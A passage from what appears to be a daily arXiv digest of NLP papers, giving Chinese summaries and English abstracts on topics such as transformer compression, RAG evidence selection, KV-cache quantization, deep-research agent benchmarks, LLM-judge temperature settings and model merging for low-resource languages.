available at this https URL.
[NLP-4] raining data generation for context-dependent rubric-based short answer grading
【速读】: 该论文旨在解决自动学生答题评分(Automatic Student Answer Grading, ASAG)中因语言差异和评分者偏见导致的评分难题,以及训练相关机器学习模型所需的大量领域特定数据不足的问题。其关键解决方案是利用一个相对较小的保密参考数据集,通过一系列简单的文本格式转换方法生成大规模的替代数据集(surrogate datasets),在保证数据隐私的前提下,使生成的数据在表层特征上比纯提示驱动(prompt-based)生成的数据更贴近原始参考数据,从而提升模型训练效果。
链接: https://arxiv.org/abs/2603.28537
作者: Pavel Šindelář,Dávid Slivka,Christopher Bouma,Filip Prášil,Ondřej Bojar
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:Every 4 years, the PISA test is administered by the OECD to test the knowledge of teenage students worldwide and allow for comparisons of educational systems. However, having to avoid language differences and annotator bias makes the grading of student answers challenging. For these reasons, it would be interesting to compare methods of automatic student answer grading. To train some of these methods, which require machine learning, or to compute parameters or select hyperparameters for those that do not, a large amount of domain-specific data is needed. In this work, we explore a small number of methods for creating a large-scale training dataset using only a relatively small confidential dataset as a reference, leveraging a set of very simple derived text formats to preserve confidentiality. Using these methods, we successfully created three surrogate datasets that are, at the very least, superficially more similar to the reference dataset than purely the result of prompt-based generation. Early experiments suggest one of these approaches might also lead to improved model training.
[NLP-5] Compressing Transformer Language Models via Matrix Product Operator Decomposition: A Case Study on PicoGPT
【速读】: 该论文旨在解决基于Transformer的语言模型在资源受限硬件上部署时因隐藏维度导致参数量二次增长而带来的计算与存储开销问题。其解决方案的关键在于采用矩阵乘积算子(Matrix Product Operator, MPO)分解方法对Transformer中的权重矩阵进行结构化压缩:通过将原始权重矩阵分解为一系列低秩核心(core)构成的链式结构,利用键维数(bond dimension χ)控制近似精度,在不依赖自定义反向传播的情况下,仅使用标准PyTorch自动微分即可实现高效训练。实验表明,MPO压缩可在保持高语言建模性能的同时显著减少参数量(最高达13倍压缩比),且在特定键维数下(如χ=8)实现了优于密集基线的参数效率(accuracy per parameter)。
链接: https://arxiv.org/abs/2603.28534
作者: Younes Javanmard,Tanmoy Pandit,Masoud Mardani
机构: Leibniz Universität Hannover (汉诺威大学); VTT Technical Research Centre of Finland (芬兰技术研究中心); National High Magnetic Field Laboratory (国家高磁场实验室)
类目: Computation and Language (cs.CL); Data Analysis, Statistics and Probability (physics.data-an)
备注:
Abstract:Transformer-based language models achieve strong performance across NLP tasks, but their quadratic parameter scaling with hidden dimension makes deployment on resource-constrained hardware expensive. We study Matrix Product Operator (MPO) decomposition as a principled compression method for transformers. MPO factorises weight matrices into chains of low-rank cores, with approximation quality controlled by the bond dimension chi. We replace every this http URL layer in PicoGPT, a GPT-2-style character-level language model with about 1M parameters, with an MPOLinear module parameterised as an MPO chain. Cores are initialised either by TT-SVD from pretrained dense weights or from random initialisation, and trained using standard PyTorch autograd without a custom backward pass. We derive balanced factorisation schemes for the five distinct weight shapes in PicoGPT and evaluate bond dimensions chi in 4, 8, 16, 32 on Tiny Shakespeare. MPO compression achieves up to 13x compression per transformer block at chi = 4. At chi = 16, the model uses 191,872 parameters instead of 1,020,224 while retaining 97.7% of baseline token accuracy (51.6% vs 52.8%). Reconstruction error follows the expected trend and is lower for three-site than two-site factorisations at the same bond dimension. The chi = 8 model gives the best accuracy per parameter, exceeding the dense baseline by 2.7x on this metric. These results show that MPO parameterisation is a practical and theoretically grounded alternative to low-rank methods and unstructured pruning for transformer compression.
[NLP-6] GraphWalker: Agent ic Knowledge Graph Question Answering via Synthetic Trajectory Curriculum
【速读】: 该论文旨在解决生成式 AI(Generative AI)在知识图谱问答(Knowledge Graph Question Answering, KGQA)任务中面临的两大挑战:一是训练数据稀缺导致的代理(agent)探索能力受限,二是推理泛化能力不足。现有方法通常限制代理的探索路径,如提示驱动的方法缺乏自主导航训练,而训练流程则常局限于预定义的推理轨迹。解决方案的关键在于提出一种名为 GraphWalker 的新型代理式 KGQA 框架,其核心创新为“自动化轨迹合成”(Automated Trajectory Synthesis)与“分阶段微调”(Stage-wise Fine-tuning)机制:首先通过约束随机游走路径自动合成结构多样化的轨迹进行第一阶段监督微调(SFT),建立广泛的知识图谱探索先验;随后在少量专家轨迹上进行第二阶段 SFT,使代理具备反思与错误恢复能力。该两阶段训练策略显著提升了轻量级强化学习(RL)阶段的性能上限,并在 CWQ、WebQSP 等基准上达到最先进水平,同时在 GrailQA 和自建 GraphWalkerBench 上验证了对分布外推理路径的更强泛化能力。
链接: https://arxiv.org/abs/2603.28533
作者: Shuwen Xu,Yao Xu,Jiaxiang Liu,Chenhao Yuan,Wenshuo Peng,Jun Zhao,Kang Liu
机构: School of Artificial Intelligence, University of Chinese Academy of Sciences (中国科学院大学人工智能学院); The Key Laboratory of Cognition and Decision Intelligence for Complex Systems, Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所复杂系统认知与决策智能重点实验室); Department of Electronic Engineering, Tsinghua University (清华大学电子工程系)
类目: Computation and Language (cs.CL)
备注:
Abstract:Agentic knowledge graph question answering (KGQA) requires an agent to iteratively interact with knowledge graphs (KGs), posing challenges in both training data scarcity and reasoning generalization. Specifically, existing approaches often restrict agent exploration: prompting-based methods lack autonomous navigation training, while current training pipelines usually confine reasoning to predefined trajectories. To this end, this paper proposes \textitGraphWalker, a novel agentic KGQA framework that addresses these challenges through \textitAutomated Trajectory Synthesis and \textitStage-wise Fine-tuning. GraphWalker adopts a two-stage SFT training paradigm: First, the agent is trained on structurally diverse trajectories synthesized from constrained random-walk paths, establishing a broad exploration prior over the KG; Second, the agent is further fine-tuned on a small set of expert trajectories to develop reflection and error recovery capabilities. Extensive experiments demonstrate that our stage-wise SFT paradigm unlocks a higher performance ceiling for a lightweight reinforcement learning (RL) stage, enabling GraphWalker to achieve state-of-the-art performance on CWQ and WebQSP. Additional results on GrailQA and our constructed GraphWalkerBench confirm that GraphWalker enhances generalization to out-of-distribution reasoning paths. The code is publicly available at this https URL
[NLP-7] EarlySciRev: A Dataset of Early-Stage Scientific Revisions Extracted from LaTeX Writing Traces LREC
【速读】: 该论文旨在解决科学写作中早期修订痕迹难以获取的问题,从而限制了对修订行为的实证研究及大语言模型(Large Language Models, LLMs)在科学写作任务中的评估。现有公开资源多仅提供最终或接近最终版本的论文,缺乏反映作者初稿阶段修改过程的数据。解决方案的关键在于利用arXiv LaTeX源文件中被注释掉的文本段落,这些内容往往保留了作者自行删除或替代的表述;通过将注释段落与邻近的最终文本对齐,并采用LLM进行过滤,从而提取出可靠的段落级修订对,最终构建了一个包含57.8万条验证修订对的数据集EarlySciRev,为科学写作动态、修订建模和LLM辅助编辑等研究提供了真实且丰富的早期修订轨迹支持。
链接: https://arxiv.org/abs/2603.28515
作者: Léane Jourdan,Julien Aubert-Béduchaud,Yannis Chupin,Marah Baccari,Florian Boudin
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted to NSLP@LREC
Abstract:Scientific writing is an iterative process that generates rich revision traces, yet publicly available resources typically expose only final or near-final versions of papers. This limits empirical study of revision behaviour and evaluation of large language models (LLMs) for scientific writing. We introduce EarlySciRev, a dataset of early-stage scientific text revisions automatically extracted from arXiv LaTeX source files. Our key observation is that commented-out text in LaTeX often preserves discarded or alternative formulations written by the authors themselves. By aligning commented segments with nearby final text, we extract paragraph-level candidate revision pairs and apply LLM-based filtering to retain genuine revisions. Starting from 1.28M candidate pairs, our pipeline yields 578k validated revision pairs, grounded in authentic early drafting traces. We additionally provide a human-annotated benchmark for revision detection. EarlySciRev complements existing resources focused on late-stage revisions or synthetic rewrites and supports research on scientific writing dynamics, revision modelling, and LLM-assisted editing.
[NLP-8] IEG-Youpu Solution for NeurIPS 2022 WikiKG90Mv2-LSC
【速读】: 该论文旨在解决大规模知识图谱(Knowledge Graph, KG)在嵌入到连续向量空间时面临的效率与准确性难以兼顾的问题。针对WikiKG90Mv2这一包含超过9000万实体的超大规模百科知识图谱,作者提出了一种“检索后重排序”(retrieve then re-rank)的流水线方法:首先设计了一种优先补全检索模型(priority infilling retrieval model),用于获取结构和语义上相似的候选三元组;随后构建基于集成学习的重排序模型(ensemble-based re-ranking model),引入邻域增强表示(neighbor enhanced representations)以提升最终链接预测性能。该方案的关键在于通过分阶段优化,在保证高效检索的同时显著提升了预测精度,实验表明验证集上的平均倒数排名(MRR)从0.2342提升至0.2839。
链接: https://arxiv.org/abs/2603.28512
作者: Feng Nie,Zhixiu Ye,Sifa Xie,Shuang Wu,Xin Yuan,Liang Yao,Jiazhen Peng,Xu Cheng
机构: Tencent(腾讯); Tsinghua University (清华大学)
类目: Computation and Language (cs.CL)
备注: 6 pages, 1 figure
Abstract:WikiKG90Mv2 in NeurIPS 2022 is a large encyclopedic knowledge graph. Embedding knowledge graphs into continuous vector spaces is important for many practical applications, such as knowledge acquisition, question answering, and recommendation systems. Compared to existing knowledge graphs, WikiKG90Mv2 is a large scale knowledge graph, which is composed of more than 90 millions of entities. Both efficiency and accuracy should be considered when building graph embedding models for knowledge graph at scale. To this end, we follow the retrieve then re-rank pipeline, and make novel modifications in both retrieval and re-ranking stage. Specifically, we propose a priority infilling retrieval model to obtain candidates that are structurally and semantically similar. Then we propose an ensemble based re-ranking model with neighbor enhanced representations to produce final link prediction results among retrieved candidates. Experimental results show that our proposed method outperforms existing baseline methods and improves MRR of validation set from 0.2342 to 0.2839.
[NLP-9] Entropic Claim Resolution: Uncertainty-Driven Evidence Selection for RAG
【速读】: 该论文旨在解决当前检索增强生成(Retrieval-Augmented Generation, RAG)系统在知识密集型和现实场景中因冲突证据或查询本质模糊性导致的认知不确定性(epistemic uncertainty)问题,即单纯依赖语义相关性进行文档检索无法有效支持推理决策。其解决方案的关键在于提出熵引导的主张解析机制(Entropic Claim Resolution, ECR),通过将RAG推理建模为对竞争性语义答案假设的熵最小化过程,采用期望熵减少(Expected Entropy Reduction, EER)作为信息价值的决策理论准则,动态选择最具区分度的原子证据主张,并在达到数学定义的认知充分性状态(H = ε,满足认知一致性)时终止检索过程。这一方法实现了从“检索最相关”到“检索最具有判别力”的范式转变,为不确定情境下的证据选择提供了严格的理论基础。
链接: https://arxiv.org/abs/2603.28444
作者: Davide Di Gioia
机构: University College London (伦敦大学学院)
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Preprint
Abstract:Current Retrieval-Augmented Generation (RAG) systems predominantly rely on relevance-based dense retrieval, sequentially fetching documents to maximize semantic similarity with the query. However, in knowledge-intensive and real-world scenarios characterized by conflicting evidence or fundamental query ambiguity, relevance alone is insufficient for resolving epistemic uncertainty. We introduce Entropic Claim Resolution (ECR), a novel inference-time algorithm that reframes RAG reasoning as entropy minimization over competing semantic answer hypotheses. Unlike action-driven agentic frameworks (e.g., ReAct) or fixed-pipeline RAG architectures, ECR sequentially selects atomic evidence claims by maximizing Expected Entropy Reduction (EER), a decision-theoretic criterion for the value of information. The process dynamically terminates when the system reaches a mathematically defined state of epistemic sufficiency (H = epsilon, subject to epistemic coherence). We integrate ECR into a production-grade multi-strategy retrieval pipeline (CSGR++) and analyze its theoretical properties. Our framework provides a rigorous foundation for uncertainty-aware evidence selection, shifting the paradigm from retrieving what is most relevant to retrieving what is most discriminative.
[NLP-10] IsoQuant: Hardware-Aligned SO(4) Isoclinic Rotations for LLM KV Cache Compression
【速读】: 该论文旨在解决低比特在线向量量化(low-bit online vector quantization)中因密集随机正交变换导致的存储和计算开销过高问题,即传统方法在执行正交特征去相关时面临 O(d2) 的复杂度瓶颈。其解决方案的关键在于提出一种基于四元数代数与 SO(4) 等斜分解(isoclinic decomposition)的块状旋转框架 IsoQuant,通过将每个 4D 块表示为四元数并应用闭式变换 T(v)=qLvqR 实现高效旋转;该框架包含两个变体:IsoQuant-Full 实现完整的 SO(4) 旋转以保证精度,而 IsoQuant-Fast 仅保留一个等斜因子以降低计算成本,在保持重建均方误差(MSE)相近的前提下显著提升了性能——在 d=128 时,前向旋转浮点运算次数从 RotorQuant 的约 2,408 减少至 1,024(Full)和 512(Fast),并在多种 CUDA 设置下实现平均 4.5–4.7× 的内核级加速。
链接: https://arxiv.org/abs/2603.28430
作者: Zhongping Ji
机构: 未知
类目: Machine Learning (cs.LG); Computation and Language (cs.CL)
备注: 11 pages
Abstract:Orthogonal feature decorrelation is effective for low-bit online vector quantization, but dense random orthogonal transforms incur prohibitive O(d^2) storage and compute. RotorQuant reduces this cost with blockwise 3 D Clifford rotors, yet the resulting 3 D partition is poorly aligned with modern hardware and offers limited local mixing. We propose \textbfIsoQuant, a blockwise rotation framework based on quaternion algebra and the isoclinic decomposition of SO(4) . It represents each 4 D block as a quaternion and applies a closed-form transform T(v)=q_L v \overlineq_R . This yields two main variants: \emphIsoQuant-Full, which realizes the full SO(4) rotation, and \emphIsoQuant-Fast, which keeps only one isoclinic factor for lower cost; the framework also admits a lightweight 2 D special case. At d=128 , IsoQuant-Full reduces forward rotation cost from about 2,408 FMAs in RotorQuant to 1,024 , while IsoQuant-Fast further reduces it to 512 . Across 18 fused CUDA settings with d \in 128,256,512 , bit widths 2,3,4 , and FP16/FP32 execution, IsoQuant achieves mean kernel-level speedups of about 4.5\times – 4.7\times over RotorQuant while maintaining comparable reconstruction MSE, with peak speedups above 6\times . Current validation is limited to the stage-1 quantize–dequantize path on synthetic normalized vectors; end-to-end KV-cache evaluation remains future work. Comments: 11 pages Subjects: Machine Learning (cs.LG); Computation and Language (cs.CL) Cite as: arXiv:2603.28430 [cs.LG] (or arXiv:2603.28430v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28430 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[NLP-11] Structural-Ambiguity-Aware Translation from Natural Language to Signal Temporal Logic
【速读】: 该论文旨在解决自然语言(Natural Language, NL)到信号时序逻辑(Signal Temporal Logic, STL)自动翻译中因自然语言结构歧义导致的映射不可靠问题。现有方法通常在解析阶段强制选择单一语法分析,忽略了NL输入中存在的多种合理语义解释,从而限制了形式化任务规范的准确性与覆盖度。解决方案的关键在于提出一种歧义保留型(ambiguity-preserving)翻译方法,其核心思想是在解析阶段不消除歧义,而是通过基于组合范畴语法(Combinatory Categorial Grammar, CCG)的三阶段流水线——歧义保留的n-best解析、面向STL的模板驱动语义合成以及带评分聚合的规范化处理——输出一组去重后的STL候选公式,并附带可解释的置信度分数,从而显式建模和保留原始自然语言指令的多义性。
链接: https://arxiv.org/abs/2603.28426
作者: Kosei Fushimi,Kazunobu Serizawa,Junya Ikemoto,Kazumune Hashimoto
机构: The University of Osaka (大阪大学)
类目: Computation and Language (cs.CL); Symbolic Computation (cs.SC)
备注:
Abstract:Signal Temporal Logic (STL) is widely used to specify timed and safety-critical tasks for cyber-physical systems, but writing STL formulas directly is difficult for non-expert users. Natural language (NL) provides a convenient interface, yet its inherent structural ambiguity makes one-to-one translation into STL unreliable. In this paper, we propose an \textitambiguity-preserving method for translating NL task descriptions into STL candidate formulas. The key idea is to retain multiple plausible syntactic analyses instead of forcing a single interpretation at the parsing stage. To this end, we develop a three-stage pipeline based on Combinatory Categorial Grammar (CCG): ambiguity-preserving n -best parsing, STL-oriented template-based semantic composition, and canonicalization with score aggregation. The proposed method outputs a deduplicated set of STL candidates with plausibility scores, thereby explicitly representing multiple possible formal interpretations of an ambiguous instruction. In contrast to existing one-best NL-to-logic translation methods, the proposed approach is designed to preserve attachment and scope ambiguity. Case studies on representative task descriptions demonstrate that the method generates multiple STL candidates for genuinely ambiguous inputs while collapsing unambiguous or canonically equivalent derivations to a single STL formula.
[NLP-12] LombardoGraphia: Automatic Classification of Lombard Orthography Variants LREC2026
【速读】: 该论文旨在解决Lombard语(一种在意大利北部和瑞士南部使用的语言变体)缺乏统一正字法标准的问题,这一问题阻碍了自然语言处理(Natural Language Processing, NLP)资源的开发与模型训练。解决方案的关键在于构建首个自动正字法分类研究,并提出LombardoGraphia数据集——一个包含11,186个标注了9种正字法变体的Lombard维基百科样本的语料库,同时训练了24种传统与神经网络分类模型,以实现对不同正字法变体的自动识别。该工作为面向语言变体的Lombard语NLP资源建设提供了关键基础设施。
链接: https://arxiv.org/abs/2603.28418
作者: Edoardo Signoroni,Pavel Rychlý
机构: 未知
类目: Computation and Language (cs.CL)
备注: To be published at LREC 2026
Abstract:Lombard, an underresourced language variety spoken by approximately 3.8 million people in Northern Italy and Southern Switzerland, lacks a unified orthographic standard. Multiple orthographic systems exist, creating challenges for NLP resource development and model training. This paper presents the first study of automatic Lombard orthography classification and LombardoGraphia, a curated corpus of 11,186 Lombard Wikipedia samples tagged across 9 orthographic variants, and models for automatic orthography classification. We curate the dataset, processing and filtering raw Wikipedia content to ensure text suitable for orthographic analysis. We train 24 traditional and neural classification models with various features and encoding levels. Our best models achieve 96.06% and 85.78% overall and average class accuracy, though performance on minority classes remains challenging due to data imbalance. Our work provides crucial infrastructure for building variety-aware NLP resources for Lombard.
[NLP-13] MiroEval: Benchmarking Multimodal Deep Research Agents in Process and Outcome
【速读】: 该论文旨在解决当前深度研究系统(deep research systems)评估中存在的一系列关键问题:现有基准测试主要基于固定评分标准评估最终报告,忽视了研究过程本身的质量;多数基准缺乏多模态覆盖,依赖合成任务而无法反映真实用户需求的复杂性,且难以随知识更新而动态迭代。为应对这些问题,作者提出MiroEval——一个面向深度研究系统的基准测试与评估框架,其核心创新在于构建了一个由100个真实用户驱动的任务集(70个纯文本、30个多模态),并通过双路径流水线支持周期性更新,实现“活体”评估环境。该框架从三个互补维度进行评估:适应性合成质量(task-specific rubrics)、代理事实性验证(agentic factuality verification,通过主动检索和推理验证来源真实性)以及过程导向型审计(process-centric evaluation,分析系统在搜索、推理与修正过程中的表现)。实证结果显示,这三个维度能揭示不同系统的能力差异,且过程质量可作为整体性能的可靠预测指标,尤其在多模态任务中系统性能显著下降,凸显了未来研究的关键挑战。
链接: https://arxiv.org/abs/2603.28407
作者: Fangda Ye,Yuxin Hu,Pengxiang Zhu,Yibo Li,Ziqi Jin,Yao Xiao,Yibo Wang,Lei Wang,Zhen Zhang,Lu Wang,Yue Deng,Bin Wang,Yifan Zhang,Liangcai Su,Xinyu Wang,He Zhao,Chen Wei,Qiang Ren,Bryan Hooi,An Bo,Shuicheng Yan,Lidong Bing
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: GitHub: this https URL
Abstract:Recent progress in deep research systems has been impressive, but evaluation still lags behind real user needs. Existing benchmarks predominantly assess final reports using fixed rubrics, failing to evaluate the underlying research process. Most also offer limited multimodal coverage, rely on synthetic tasks that do not reflect real-world query complexity, and cannot be refreshed as knowledge evolves. To address these gaps, we introduce MiroEval, a benchmark and evaluation framework for deep research systems. The benchmark comprises 100 tasks (70 text-only, 30 multimodal), all grounded in real user needs and constructed via a dual-path pipeline that supports periodic updates, enabling a live and evolving setting. The proposed evaluation suite assesses deep research systems along three complementary dimensions: adaptive synthesis quality evaluation with task-specific rubrics, agentic factuality verification via active retrieval and reasoning over both web sources and multimodal attachments, and process-centric evaluation audits how the system searches, reasons, and refines throughout its investigation. Evaluation across 13 systems yields three principal findings: the three evaluation dimensions capture complementary aspects of system capability, with each revealing distinct strengths and weaknesses across systems; process quality serves as a reliable predictor of overall outcome while revealing weaknesses invisible to output-level metrics; and multimodal tasks pose substantially greater challenges, with most systems declining by 3 to 10 points. The MiroThinker series achieves the most balanced performance, with MiroThinker-H1 ranking the highest overall in both settings. Human verification and robustness results confirm the reliability of the benchmark and evaluation framework. MiroEval provides a holistic diagnostic tool for the next generation of deep research agents.
[NLP-14] Marco DeepResearch: Unlocking Efficient Deep Research Agents via Verification-Centric Design
【速读】: 该论文旨在解决深度研究代理(Deep Research Agent)在长期任务中因缺乏显式验证机制而导致的错误传播问题,从而影响整体性能。现有范式在问答数据合成、轨迹构建及推理时扩展过程中均未引入可靠验证,导致误差累积并降低代理表现。其解决方案的关键在于提出一种以验证为核心的框架设计,从三个层面进行优化:(1)问答数据合成阶段引入验证机制,确保问题难度可控且答案唯一正确;(2)轨迹构建阶段设计验证驱动的合成方法,在训练轨迹中注入显式验证模式;(3)推理阶段利用自身作为验证器进行测试时扩展,显著提升复杂问题上的性能。实验表明,该方案使8B规模代理在BrowseComp等挑战性基准上超越多个30B规模模型。
链接: https://arxiv.org/abs/2603.28376
作者: Bin Zhu,Qianghuai Jia,Tian Lan,Junyang Ren,Feng Gu,Feihu Jiang,Longyue Wang,Zhao Xu,Weihua Luo
机构: Alibaba International Digital Commerce
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep research agents autonomously conduct open-ended investigations, integrating complex information retrieval with multi-step reasoning across diverse sources to solve real-world problems. To sustain this capability on long-horizon tasks, reliable verification is critical during both training and inference. A major bottleneck in existing paradigms stems from the lack of explicit verification mechanisms in QA data synthesis, trajectory construction, and test-time scaling. Errors introduced at each stage propagate downstream and degrade the overall agent performance. To address this, we present Marco DeepResearch, a deep research agent optimized with a verification-centric framework design at three levels: \textbf(1)~QA Data Synthesis: We introduce verification mechanisms to graph-based and agent-based QA synthesis to control question difficulty while ensuring answers are unique and correct; \textbf(2)~Trajectory Construction: We design a verification-driven trajectory synthesis method that injects explicit verification patterns into training trajectories; and \textbf(3)~Test-time scaling: We use Marco DeepResearch itself as a verifier at inference time and effectively improve performance on challenging questions. Extensive experimental results demonstrate that our proposed Marco DeepResearch agent significantly outperforms 8B-scale deep research agents on most challenging benchmarks, such as BrowseComp and BrowseComp-ZH. Crucially, under a maximum budget of 600 tool calls, Marco DeepResearch even surpasses or approaches several 30B-scale agents, like Tongyi DeepResearch-30B.
[NLP-15] Not All Subjectivity Is the Same! Defining Desiderata for the Evaluation of Subjectivity in NLP
【速读】: 该论文试图解决当前自然语言处理(Natural Language Processing, NLP)模型评估方法与具有主观性敏感性的模型目标不一致的问题,尤其是这些模型旨在反映多元视角、凸显边缘群体声音的初衷未能在评估实践中得到充分体现。解决方案的关键在于提出七个基于NLP数据与模型中主观性表征方式的评估理想标准(evaluation desiderata),采用自上而下的构建方法,并强调用户中心影响,以系统性地弥合现有实验设计中对主观性维度(如输入模糊性与多声部性区分、主观表达的有效传递、各理想标准间的交互作用等)研究不足的空白。
链接: https://arxiv.org/abs/2603.28351
作者: Urja Khurana,Michiel van der Meer,Enrico Liscio,Antske Fokkens,Pradeep K. Murukannaiah
机构: 未知
类目: Computation and Language (cs.CL)
备注: Under review
Abstract:Subjective judgments are part of several NLP datasets and recent work is increasingly prioritizing models whose outputs reflect this diversity of perspectives. Such responses allow us to shed light on minority voices, which are frequently marginalized or obscured by dominant perspectives. It remains a question whether our evaluation practices align with these models’ objectives. This position paper proposes seven evaluation desiderata for subjectivity-sensitive models, rooted in how subjectivity is represented in NLP data and models. The desiderata are constructed in a top-down approach, keeping in mind the user-centric impact of such models. We scan the experimental setup of 60 papers and show that various aspects of subjectivity are still understudied: the distinction between ambiguous and polyphonic input, whether subjectivity is effectively expressed to the user, and a lack of interplay between different desiderata, amongst other gaps.
[NLP-16] Kernel-Smith: A Unified Recipe for Evolutionary Kernel Optimization
【速读】: 该论文旨在解决高性能GPU内核(GPU kernel)与算子(operator)自动化生成中的效率与通用性问题,尤其是在复杂异构计算平台上的可迁移优化挑战。解决方案的关键在于提出Kernel-Smith框架,其核心创新包括:(1)基于稳定评估驱动的进化代理(evaluation-driven evolutionary agent),通过维护可执行候选程序种群并利用编译、正确性和加速比等结构化执行反馈进行迭代优化;(2)引入面向进化的后训练策略(evolution-oriented post-training recipe),将长时程进化轨迹转化为以步骤为中心的监督信号和强化学习信号,使模型在进化循环中扮演局部改进器而非一次性生成器的角色。这一设计显著提升了生成内核的质量与收敛稳定性,并在NVIDIA Triton和MetaX MACA等多个异构平台上实现优于前沿商业模型的性能表现,验证了LLM驱动的内核优化从基准测试向实际生产系统(如SGLang和LMDeploy)迁移的可行性。
链接: https://arxiv.org/abs/2603.28342
作者: He Du,Qiming Ge,Jiakai Hu,Aijun Yang,Zheng Cai,Zixian Huang,Sheng Yuan,Qinxiu Cheng,Xinchen Xie,Yicheng Chen,Yining Li,Jiaxing Xie,Huanan Dong,Yaguang Wu,Xiangjun Huang,Jian Yang,Hui Wang,Bowen Zhou,Bowen Li,Qipeng Guo,Kai Chen
机构: Shanghai AI Laboratory(上海人工智能实验室); Fudan University(复旦大学); MetaX
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注:
Abstract:We present Kernel-Smith, a framework for high-performance GPU kernel and operator generation that combines a stable evaluation-driven evolutionary agent with an evolution-oriented post-training recipe. On the agent side, Kernel-Smith maintains a population of executable candidates and iteratively improves them using an archive of top-performing and diverse programs together with structured execution feedback on compilation, correctness, and speedup. To make this search reliable, we build backend-specific evaluation services for Triton on NVIDIA GPUs and Maca on MetaX GPUs. On the training side, we convert long-horizon evolution trajectories into step-centric supervision and reinforcement learning signals by retaining correctness-preserving, high-gain revisions, so that the model is optimized as a strong local improver inside the evolutionary loop rather than as a one-shot generator. Under a unified evolutionary protocol, Kernel-Smith-235B-RL achieves state-of-the-art overall performance on KernelBench with Nvidia Triton backend, attaining the best average speedup ratio and outperforming frontier proprietary models including Gemini-3.0-pro and Claude-4.6-opus. We further validate the framework on the MetaX MACA backend, where our Kernel-Smith-MACA-30B surpasses large-scale counterparts such as DeepSeek-V3.2-think and Qwen3-235B-2507-think, highlighting potential for seamless adaptation across heterogeneous platforms. Beyond benchmark results, the same workflow produces upstream contributions to production systems including SGLang and LMDeploy, demonstrating that LLM-driven kernel optimization can transfer from controlled evaluation to practical deployment.
[NLP-17] he Necessity of Setting Temperature in LLM -as-a-Judge
【速读】: 该论文旨在解决大语言模型(Large Language Model, LLM)作为评判者(LLM-as-a-Judge)在文本质量与事实正确性评估中,温度(temperature)参数设置对评判性能影响不明确的问题。现有实践中普遍采用固定温度值(如0.1和1.0),但缺乏理论依据且未考虑任务依赖性。解决方案的关键在于通过一系列受控实验系统性地探究温度与评判性能之间的关系,并引入因果推断框架对温度对评判行为的直接因果效应进行严谨统计分析,从而为基于LLM的评估流水线设计提供可操作的工程洞见。
链接: https://arxiv.org/abs/2603.28304
作者: Lujun Li,Lama Sleem,Yangjie Xu,Yewei Song,Aolin Jia,Jerome Francois,Radu State
机构: University of Luxembourg (卢森堡大学); ETH Zürich (苏黎世联邦理工学院)
类目: Computation and Language (cs.CL)
备注:
Abstract:LLM-as-a-Judge has emerged as an effective and low-cost paradigm for evaluating text quality and factual correctness. Prior studies have shown substantial agreement between LLM judges and human experts, even on tasks that are difficult to assess automatically. In practice, researchers commonly employ fixed temperature configurations during the evaluation process-with values of 0.1 and 1.0 being the most prevalent choices-a convention that is largely empirical rather than principled. However, recent researches suggest that LLM performance exhibits non-trivial sensitivity to temperature settings, that lower temperatures do not universally yield optimal outcomes, and that such effects are highly task-dependent. This raises a critical research question: does temperature influence judge performance in LLM centric evaluation? To address this, we systematically investigate the relationship between temperature and judge performance through a series of controlled experiments, and further adopt a causal inference framework within our empirical statistical analysis to rigorously examine the direct causal effect of temperature on judge behavior, offering actionable engineering insights for the design of LLM-centric evaluation pipelines.
[NLP-18] Merge and Conquer: Instructing Multilingual Models by Adding Target Language Weights LREC2026
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在低资源语言中性能不足的问题,特别是针对这些语言缺乏高质量指令数据和高昂计算资源限制的挑战。传统适应方法如持续预训练或指令微调往往难以实施,因其依赖大量计算资源和人工标注的高质量指令数据。论文提出的关键解决方案是采用模型融合(model merging)技术,通过将一个已指令调优的通用语言模型与特定语言的基础模型进行融合,从而无需重新进行指令微调即可获得新语言的指令遵循能力,并支持多语言能力的构建。实验表明,该方法在四种伊比利亚语言(巴斯克语、加泰罗尼亚语、加利西亚语和西班牙语)上有效提升了指令理解性能,同时显著降低了计算成本,验证了模型融合作为低资源语言适配的一种高效替代方案的可行性。
链接: https://arxiv.org/abs/2603.28263
作者: Eneko Valero,Maria Ribalta i Albado,Oscar Sainz,Naiara Perez,German Rigau
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: This paper was accepted at the 15th edition of the Language Resources and Evaluation Conference (LREC 2026)
Abstract:Large Language Models (LLMs) remain heavily centered on English, with limited performance in low-resource languages. Existing adaptation approaches, such as continual pre-training, demand significant computational resources. In the case of instructed models, high-quality instruction data is also required, both of which are often inaccessible for low-resource language communities. Under these constraints, model merging offers a lightweight alternative, but its potential in low-resource contexts has not been systematically explored. In this work, we explore whether it is possible to transfer language knowledge to an instruction-tuned LLM by merging it with a language-specific base model, thereby eliminating the need of language-specific instructions and repeated fine-tuning processes whenever stronger instructed variants become available. Through experiments covering four Iberian languages (Basque, Catalan, Galician, and Spanish) and two model families, we show that merging enables effective instruction following behavior in new languages and even supports multilingual capability through the combination of multiple language-specific models. Our results indicate that model merging is a viable and efficient alternative to traditional adaptation methods for low-resource languages, achieving competitive performance while greatly reducing computational cost.
[NLP-19] Coconstructions in spoken data: UD annotation guidelines and first results
【速读】: 该论文旨在解决跨说话人回合(speaker turns)的句法依存关系标注问题,尤其针对协作式共构建(collaborative coconstructions)、疑问句回答(wh-question answers)及回应性话语(backchannels)等现象在口语语料库中的标准化表示难题。其解决方案的关键在于提出两种互补的表示方式:一是基于说话人回合的分段表示,二是允许跨回合依存关系的依赖结构表示;同时引入区分重构(reformulations)与修复(repairs)的新标准,并对未完成短语中的成分进行显式标注,从而提升口语树库在Universal Dependencies框架下的表达能力与一致性。
链接: https://arxiv.org/abs/2603.28261
作者: Ludovica Pannitto,Sylvain Kahane,Kaja Dobrovoljc,Elena Battaglia,Bruno Guillaume,Caterina Mauri,Eleonora Zucchini
机构: 未知
类目: Computation and Language (cs.CL)
备注:
